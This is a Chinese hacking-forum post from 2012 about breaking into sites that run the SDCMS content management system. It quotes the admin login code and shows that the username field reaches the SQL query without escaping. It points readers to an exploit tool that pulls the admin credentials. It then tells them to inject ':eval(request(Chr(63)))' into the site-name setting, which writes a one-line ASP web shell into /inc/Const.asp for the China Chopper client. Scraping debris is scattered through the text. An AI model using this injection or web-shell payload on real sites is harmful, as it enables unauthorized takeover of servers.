作者:T00LS 鬼哥
" z+ S" u& P$ i- H, f* O6 O漏洞文件:后台目录/index.asp f+ U( u+ e5 Q- C9 g4 m
+ R I. _9 b) Y/ H" Q; A ?Sub Check
( Z, b+ |" m6 F Dim username,password,code,getcode,Rs
3 V, ^" U- f! R0 B6 O5 j IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub, k& ?9 R' i2 C9 Y) q" g% i/ q
username=FilterText(Trim(Request.Form("username")),1)& B) y- S3 g* \% c5 x
password=FilterText(Trim(Request.Form("password")),1)
8 s; k) W& s4 p/ }+ f1 s code=Trim(Request.Form("yzm"))
7 g/ U" g- Z; B( M$ C7 J getcode=Session("SDCMSCode")3 j) e/ V# }: }5 Y/ `
IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died, j- ?+ E. E9 g% _5 Z [0 j
IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied
5 a! ? ^2 L* ?8 A IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied$ g, J+ G/ V& b6 o. |$ V
IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied; Q6 n# _0 p# e* _9 a
IF username="" or password="" Then# C% J9 w: [: W
Echo "用户名或密码不能为空"ied
0 ?2 w4 Q* e& I Else$ ?; c6 R9 _. O* J3 p( \6 g6 F
Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")
. A" M7 J! d7 J2 B1 W6 x IF Rs.Eof Then7 h( Y& q0 j& R6 Z# g' h+ I
AddLog username,GetIp,"登录失败",1
. E) D; S7 B$ m Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"
7 K& c4 ?! t2 p Else, f$ J/ B: D% m7 M
Add_Cookies "sdcms_id",Rs(0)5 h$ Z2 M: }% R% }
Add_Cookies "sdcms_name",username7 o. p5 T" s& _7 d
Add_Cookies "sdcms_pwd",Rs(2)
/ W+ G1 E- Y F5 H0 k Add_Cookies "sdcms_admin",Rs(3)
& D( ^% q3 o6 q$ s- T" u Add_Cookies "sdcms_alllever",Rs(4)7 @& J% M7 R+ r2 \& }
Add_Cookies "sdcms_infolever",Rs(5)
, }5 {1 `0 g% X) O Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")
$ T! v1 ]7 ^. t9 A AddLog username,GetIp,"登录成功",1" B9 Z8 w) r7 W: i8 Z, y5 J' m" o& X
'自动删除30天前的Log记录4 T' r4 u8 u) n$ y8 ~: A4 f7 y6 N% V0 Z
IF Sdcms_DataType Then8 O, l, `$ x/ M% I7 k# R/ ^5 O: p
Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")# J8 h! ]2 T8 k4 M& j
Else
9 u# [! N7 a% B8 w Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")- k# \+ S. P1 O0 Z$ P' c
End IF
) C K+ b# u7 W Go("sdcms_index.asp")
; E- _- @+ k. u* e0 u" F End IF/ }, S+ h4 y& @# U
Rs.Close
0 k5 n! ~5 p4 t5 o9 l# c$ P, U Set Rs=Nothing
8 V" @ r0 N- W* `& C3 X. f1 A End IF
1 H# W) A* j; ~$ x6 i! }, X1 LEnd Sub1 k+ [( q' x0 j
/ {+ f( ?! l" c’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码
3 W3 P' u) S) ^# v, N/ v/ m
( B7 E$ R# S+ _0 ^; Y f- _6 r9 L& |0 YFunction FilterText(ByVal t0,ByVal t1)
0 U3 A/ b. D1 i" y) B6 H IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function" b$ s$ N8 u4 v5 `8 ]
t0=Trim(t0)9 n( J8 N+ J5 F& C \" N
Select Case t16 B$ m6 D/ _ R) C y8 Z X" S1 J
Case "1"1 C, |/ G5 W1 ]& E8 j( W+ }9 N
t0=Replace(t0,Chr(32),"")/ a7 b2 O" d( r0 L a+ A
t0=Replace(t0,Chr(13),"") H- ]! s8 d) ]* f3 R7 Q
t0=Replace(t0,Chr(10)&Chr(10),""): g" E* o+ M o7 c) c/ |
t0=Replace(t0,Chr(10),"")- r2 e7 m! _2 j2 l3 T+ F
Case "2"0 x0 U* D: `4 j. Y; h4 U
t0=Replace(t0,Chr(8),"")'回格& R8 x$ f! I+ r5 g& T: X
t0=Replace(t0,Chr(9),"")'tab(水平制表符)* T5 V2 k6 r* \* c+ k( ^1 S" U
t0=Replace(t0,Chr(10),"")'换行( _6 w+ ]0 s) q1 T! [! [4 }
t0=Replace(t0,Chr(11),"")'tab(垂直制表符)
+ H- y. a, q) \, `! A t0=Replace(t0,Chr(12),"")'换页
, S% j1 _- R; J1 w t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合
( A& ?/ W& {# ]1 d t0=Replace(t0,Chr(22),"")" G. {3 Y. Q: J5 R; Y; K1 D0 d
t0=Replace(t0,Chr(32),"")'空格 SPACE
% x* d, Y# g3 D, I t0=Replace(t0,Chr(33),"")'!
8 C5 ^9 W1 n) ?6 P& p4 S t0=Replace(t0,Chr(34),"")'"
) `9 _. G9 X* I1 _: I) G t0=Replace(t0,Chr(35),"")'#% @ t" }4 ]0 l$ o$ s
t0=Replace(t0,Chr(36),"")'$
8 v. ]$ J h3 T; A, l1 z( s t0=Replace(t0,Chr(37),"")'%3 t1 d/ [8 E* f2 [/ ~) _' t5 W
t0=Replace(t0,Chr(38),"")'&" ~1 _( i+ V+ Y O
t0=Replace(t0,Chr(39),"")''( K+ Q- m" G+ A1 \8 Z3 v
t0=Replace(t0,Chr(40),"")'(
6 \1 |! |) q: Z: B t0=Replace(t0,Chr(41),"")')
2 u9 W+ ~% X& X$ @3 r8 q( u t0=Replace(t0,Chr(42),"")'*- f `2 S8 j2 d
t0=Replace(t0,Chr(43),"")'+
: [( w( u- V c$ p( a; X t0=Replace(t0,Chr(44),"")',
r* X0 C& ?6 @6 v! m0 O* {2 t t0=Replace(t0,Chr(45),"")'-
. |" z$ p8 v B8 X! ?7 m t0=Replace(t0,Chr(46),"")'.0 _6 ~: T r& }" o9 Q5 G0 a
t0=Replace(t0,Chr(47),"")'/
, i1 T0 N1 P0 m! d) Z t0=Replace(t0,Chr(58),"")':5 d* N, [8 f5 Z7 P' T
t0=Replace(t0,Chr(59),"")';0 F2 y, M4 f2 M, @
t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>
# w0 [% T, d- ^4 y6 a t0=Replace(t0,Chr(63),"")'?
7 k5 m0 n, G! F# y' R4 U% X1 J t0=Replace(t0,Chr(64),"")'@
" m. C, v4 |* P0 M, M' D t0=Replace(t0,Chr(91),"")'\
: r; D: s% ]* b* p% d t0=Replace(t0,Chr(92),"")'\4 H* J% @- ]) s# u) x& ^5 P; e0 w
t0=Replace(t0,Chr(93),"")']( U* I2 x* M+ D$ n( w
t0=Replace(t0,Chr(94),"")'^
4 {; }% _' _! h* J. j' x1 V t0=Replace(t0,Chr(95),"")'_- Q$ P$ ^' G6 W
t0=Replace(t0,Chr(96),"")'`
1 @ \. V5 F' w3 D0 r4 v4 t t0=Replace(t0,Chr(123),"")'{
/ {% E: }; k6 x* h3 q t0=Replace(t0,Chr(124),"")'|
; {0 a% Q* z6 u+ W t0=Replace(t0,Chr(125),"")'}0 S' v6 g7 O+ s F. b8 R
t0=Replace(t0,Chr(126),"")'~; \9 O2 A1 K( d1 R* Z# P
Case Else
0 V: _5 o- d: ?, S f' N t0=Replace(t0, "&", "&")7 Z* M4 x- q$ M" P P
t0=Replace(t0, "'", "'")7 E t2 c1 |( p& S0 x! \
t0=Replace(t0, """", """)( I0 N& T9 @% Q' z" O) T; Q4 m
t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")
) R/ }% ^: z3 N" F+ r h2 P End Select% Y" K5 |) r5 u. G% S
IF Instr(Lcase(t0),"expression")>0 Then
2 b/ F3 t1 b2 m2 K, e& s t0=Replace(t0,"expression","e­xpression", 1, -1, 0)$ C S2 y4 k# r7 n$ ^
End If- B: u! k7 h: `' y2 @1 q ^! {& F
FilterText=t0
5 v$ G2 ~3 c6 IEnd Function: u2 X3 o/ U0 p/ I3 j4 e2 V- Y
$ \5 m* F i+ l2 N' w
看到没。直接参数是1 只过滤& I$ R/ Z+ q5 F9 b& v# M" q5 S' H. g5 k
t0=Replace(t0,Chr(32)," ")
3 x5 T$ `) s) j8 o( v t0=Replace(t0,Chr(13),"")9 Z" _. F4 i% Y
t0=Replace(t0,Chr(10)&Chr(10),"
7 x$ U' Y# N9 d! {2 V")
9 C @$ T* ]4 J9 \2 ? t0=Replace(t0,Chr(10),"# A7 Z6 T, B# \+ E8 u% e) P) o5 _6 a
")6 o) h! m1 J7 ^+ a
漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!/ i7 p4 E2 w. K& B% I
EXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP
/ ~& V! @5 ~/ ~0 B
# B- p d% s: c- y测试:
7 J _' l, H* ?( ]! a5 J y9 h# e# q/ c7 }
$ T# ~. j2 Z" a
现在输入工具上验证码,然后点OK
. j% _( L& ?( d& p M* U' k
: x4 s2 {* r! Z) `) E0 t, ?4 S
! [8 H9 O. {$ Q: k1 V看到我们直接进入后台管理界面了,呵呵!
/ ~8 Q2 \/ d! y2 m: V' u: r( H$ p9 L8 X
2 F! [" \. I+ y; s; w- l& H" C" ^, j7 ?9 t
这样直接进入后台了。。。。
) f' `, ~/ }- X+ [$ u
+ I$ m/ Z% |; ?% E" Q , S- W+ o0 ^$ J! z
3 O! I1 ]) y. b; ]; u: f/ _SDCMS提权:. I& h5 N- R2 i* `6 l; H
5 g6 a) }# {9 B: O5 K3 X方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?* T" t2 Q6 S& \ n
+ K, `$ V7 F5 a+ _* T
& G+ c1 P" Z) l2 F3 J) i5 d
! b! w' u! l+ H, I0 g1 a
OK,现在用菜刀连接下!
) J8 J+ {* ]% a
?: w R. c8 w+ M- \8 p
, H5 a" h) q% N# {1 T+ V4 l! L& c0 X5 U, ^3 ?
: b. o$ o1 W2 F/ `% Y$ R, y5 }% G* @+ H. K: X! f/ A3 L. I6 f
|
发表于 2012-11-9 20:57:02
收藏
支持
反对